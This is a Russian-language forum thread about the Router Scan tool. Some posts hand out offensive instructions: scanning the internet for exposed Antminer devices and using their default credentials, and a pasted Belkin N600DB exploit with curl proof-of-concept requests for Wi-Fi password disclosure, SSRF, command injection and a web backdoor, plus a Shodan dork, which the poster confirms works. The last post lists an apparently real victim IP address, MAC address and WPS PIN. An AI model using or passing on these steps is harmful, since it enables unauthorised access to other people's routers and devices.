не стоит заморачиваться. на этой ветке форума ранее уже обсуждался вопрос больших словарей по дефолту. пройдитесь по форуму. бесполезное занятие. таймаут не поможет. и в частности, большинство роутеров просто залочится (как одна из причин). для отсутствующих в списке паролей рекомендуется использовать функцию юс крединтиалс. хотя в принципе творческий подход к делу всегда заслуживает уважения...
здесь вам не ответят на этот вопрос. не потому, что не знают, а потому как : Spoiler 1. на этой ветке форума в основном собрались экспериментаторы, а не взломщики. взломами и мелкими пакостями с помощью роутерскана занимаются по большей части скрипткиди, которые "не забывают все галочки выставлять" в роутерскане большинство участников данной ветки такие вещи, как взломы и угоны не одобряют. достаточно просто прочитать посты старожилов, чтобы убедиться в этом. 2.данная ветка форума, одна из самых обсуждаемых на форуме, т.к.роутерскан - один из самых топовых инструментов в нете. и в связи с этим привлекает к себе повышенное внимание не только любознательных участников, но и серьезных дядей в погонах. потому, это не та площадка для такого обсуждения. с такими вопросами вам действительно лучше в даркнете побродить. там обсуждаются взломы банкоматов, банковских серверов, угоны пайпала и майнеров. 3.роутерскан в этом деле не помощник. тут требуются другие инструменты и другой подход. роутерскан - это мощный интеллигентный тестер, но с другими задачами. и никто его не будет подгонять под нужды каждого желающего что-либо взломать или угнать. теперь по теме. антминер работает через стандартный роутер. его подключают как клиента. потому его нужно искать ИМХО только через роутер. уверен, что вы в курсе этого, но на всякий случай https://mining-help.ru/articles/83-nastroika-antminer-s9-i-podklyuchenie.html попробуйте просканировать диапазон портов 3333. пройдитесь по диапазону, к примеру змапом, потом подключайте другие инструменты по найденным айпишникам.и в случае удачи - найдете. если определили - изучите конфиги. стандартный логин-пасс можно взять к примеру в том числе и отсюда https://github.com/bitmaintech/Antm...ghttpd-1.0/www/cgi-bin/minerConfiguration.cgi основной файл minerConfiguration.cgi (к слову по тому-же запросу можете поискать и на шодане). в том-же файле можно поискать и баги ( если дружите с кодингом). во всяком случае эксплойты тоже есть на антминер. наталкивался как-то несколько раз. лень искать. сами сможете найти. но в любом случае для роутерскана ( даже если бы и стоял так вопрос) они не пригодны. там нужно ручками ковырять. но в целом-полностью согласен с Ossen хотя в некотором смысле этот вопрос пересекается с роутерами. так-что это не совсем флуд. тем более, что изначально человеком ставился вопрос о включении антминера в роутерскан в соответствии с вашим предложением так и сделал. надеюсь, что мой ответ (в меру моих, наиболее чем скромных, познаний) вас удовлетворит.
https://miloserdov.org/?p=712 Новая статья про Router Scan v2.60 вышла, хорошо раскрывает потенциал новых фич, понравилась.
тут та же статья только на русском. алексей дублирует свои статьи на английском для западных читателей. оно и правильно....нужно развиваться в ширь, не только в высоту
@sha9 aka Dik Lee зачем пользователей в заблуждение вводишь? Сам то не разобрался... отправляйся читать документацию... (по посту - ответил на том форуме)
шифу, документацию я читал. но в памяти живут ваши слова по поводу дополнительных модулей, высказанных вами на форуме ранее. к сожалению еще их не нашел. тогда стоял вопрос о добавлении эксплойтов в майадмин. и вы объяснили, что они (модули) есть, но не работают. может что не так понял. тогда извините... пост на том форуме удаляю, дабы не вводить в заблуждение
я и не настаивал это дело чисто субъективное, зависящее от многих факторов хотя, пусть с модулями я накосячил (что-то недопонял, а пост найти не могу,чтобы перечитать и понять где ошибся.видимо он ушел при глюке форума), а вот по поводу расширения словарей вы меня не поняли. я говорил о расширении словарей до размера радужных таблиц, а вы в том посте говорили о доработке под провайдера. это несколько разные вещи. п.с. я когда начал знакомиться с программой, тоже нарасширял так, что потом только с вашей помощью смог разобраться в чем проблема. так-что расширение проведено через личный опыт т.с.
я уже сам запутался пример старые версии RS эти словари (что сам собирал) проходят. в новых что они есть что их нету нужная пара логин пароль присутствуют в словарях но увы
эксплойт на Belkin N600DB Wireless Router. не знаю реализацию его в роутерскане. в списке поддерживаемых устройств есть, а в списке эксплойтов нет. но на всякий случай может кому будет интересно поиграться самому. не все же только на кнопочку старт тыкать эксплойт от 16/01/2018. Spoiler: exploit # Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities # Date: 16/01/2018 # Exploit Author: Wadeek # Hardware Version: F9K1102as v3 # Firmware Version: 3.04.11 # Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as # Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin == Wireless Fingerprinting == ESSID: "belkin.XXX" :Mode: Master Encryption key WPA2 Version 1 CCMP PSK: on Wireless Password/PIN: 8-alphanumeric DHCP: enable (192.168.2.1) MAC Address: 58:EF:68 == Web Fingerprinting (With Locked Web Interface) == dork: www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm" Device images: /images/troubleshooting/checkWires.png (600x270) /images/troubleshooting/startModem.png (600x270) /images/troubleshooting/stopModem.png (600x270) /images/troubleshooting/restartRouter.png (600x270) Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js == PoC == Disclore wifi password: curl --silent "http://192.168.2.1/langchg.cgi" curl --silent "http://192.168.2.1/adv_wifidef.cgi" Closed "HTTPD server" port: curl --silent "http://192.168.2.1/removepwd.cgi" --data "" Web Backdoor: http://192.168.2.1/dev.htm Server-Side Request Forgery (HTTP/FTP): {45.33.32.156 == scanme.nmap.org} curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/" curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/" Command Injection: curl --silent "http://IP/proxy.cgi?chk&url=--help" проверял этот запрос http://IP/langchg.cgi на получение вайфай. работает. при переходе на страницу запроса из браузера, нужно открывать иходный код страницы. там и ессид и пароль. если подключать запросы через бурп и etc, то этого не потребуется, дорк для шодана ""Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm" " вводить полностью (пояснения для тех, кто спрашивает как пользоваться чарльзом ).
Ничего сверхъестественного, просто айпи из списка пиров к популярной раздаче на одном из трекеров Spoiler
binarymaster, ASUS DSL-N14U ADSL BC:EE:7B:60:BD:08 пока на 109.184.42.125 авторизация зациклилась, отпарсились мак и пин.